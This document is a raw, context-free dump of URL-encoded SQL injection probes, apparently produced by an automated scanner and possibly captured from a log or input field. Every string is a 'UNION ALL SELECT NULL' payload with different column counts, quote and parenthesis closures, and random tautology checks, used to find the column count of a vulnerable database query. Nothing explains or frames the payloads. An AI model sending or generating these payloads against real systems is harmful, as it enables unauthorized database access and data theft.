1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ODlB%22%3D%22ODlB 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22mKWY%22%3D%22mKWY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22NzVF%22%3D%22NzVF 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22mGdJ%22%3D%22mGdJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22IaSy%22%3D%22IaSy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22grNg%22%3D%22grNg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22hHzZ%22%3D%22hHzZ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vbZg%22%3D%22vbZg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22yyLH%22%3D%22yyLH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22YAMW%22%3D%22YAMW 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22oUZV%22%3D%22oUZV 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22eNTb%22%3D%22eNTb 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22IQaB%22%3D%22IQaB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22bqsB%22%3D%22bqsB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nOiV%22%3D%22nOiV 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22NUVt%22%3D%22NUVt 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22tQYl%22%3D%22tQYl 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22OBTM%22%3D%22OBTM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22PzEm%22%3D%22PzEm 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22wNtG%22%3D%22wNtG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22hwpw%22%3D%22hwpw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ytTi%22%3D%22ytTi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nATa%22%3D%22nATa 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22DggE%22%3D%22DggE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22yUHc%22%3D%22yUHc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IuXT%22%3D%22IuXT 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22nxCV%22%3D%22nxCV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22HeaR%22%3D%22HeaR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NlSj%22%3D%22NlSj 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Kmwy%22%3D%22Kmwy 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22XsRP%22%3D%22XsRP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22xveU%22%3D%22xveU 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wEfe%22%3D%22wEfe 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22QEqm%22%3D%22QEqm 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22mOCV%22%20LIKE%20%22mOCV 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22rmTn%22%20LIKE%20%22rmTn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qaaZ%22%20LIKE%20%22qaaZ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22BtHa%22%20LIKE%20%22BtHa 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IzQW%22%20LIKE%20%22IzQW 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WmqI%22%20LIKE%20%22WmqI 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22oCui%22%20LIKE%20%22oCui 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22mRrh%22%20LIKE%20%22mRrh 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22QQyu%22%20LIKE%20%22QQyu 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ZAqw%22%20LIKE%20%22ZAqw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tEkx%22%20LIKE%20%22tEkx 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Nbmn%22%20LIKE%20%22Nbmn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Fnri%22%20LIKE%20%22Fnri 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22VCuy%22%20LIKE%20%22VCuy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kjew%22%20LIKE%20%22kjew 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tKDm%22%20LIKE%20%22tKDm 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vUjr%22%20LIKE%20%22vUjr 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22JGZE%22%20LIKE%20%22JGZE 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22jMXR%22%20LIKE%20%22jMXR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22AWNB%22%20LIKE%20%22AWNB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22LYUt%22%20LIKE%20%22LYUt 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22WHOC%22%20LIKE%20%22WHOC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22kLAU%22%20LIKE%20%22kLAU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22sqTo%22%20LIKE%20%22sqTo 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22iqIE%22%20LIKE%20%22iqIE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22wgSA%22%20LIKE%20%22wgSA 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ODVG%22%20LIKE%20%22ODVG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ROxJ%22%20LIKE%20%22ROxJ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22aAzF%22%20LIKE%20%22aAzF 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22JSFH%22%20LIKE%20%22JSFH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22DIts%22%20LIKE%20%22DIts 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22pcsf%22%20LIKE%20%22pcsf 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22swRO%22%20LIKE%20%22swRO 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22iWPE%22%20LIKE%20%22iWPE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22MpMQ%22%20LIKE%20%22MpMQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22khQX%22%20LIKE%20%22khQX 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Mfph%22%20LIKE%20%22Mfph 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VuGg%22%20LIKE%20%22VuGg 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22AvXg%22%20LIKE%20%22AvXg 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IBqS%22%20LIKE%20%22IBqS 1%29%20WHERE%201851%3D1851%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%209485%3D9485%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%206577%3D6577%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207174%3D7174%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%205724%3D5724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%205428%3D5428%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207552%3D7552%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%206911%3D6911%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%202536%3D2536%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207451%3D7451%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%203113%3D3113%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209264%3D9264%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%201302%3D1302%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 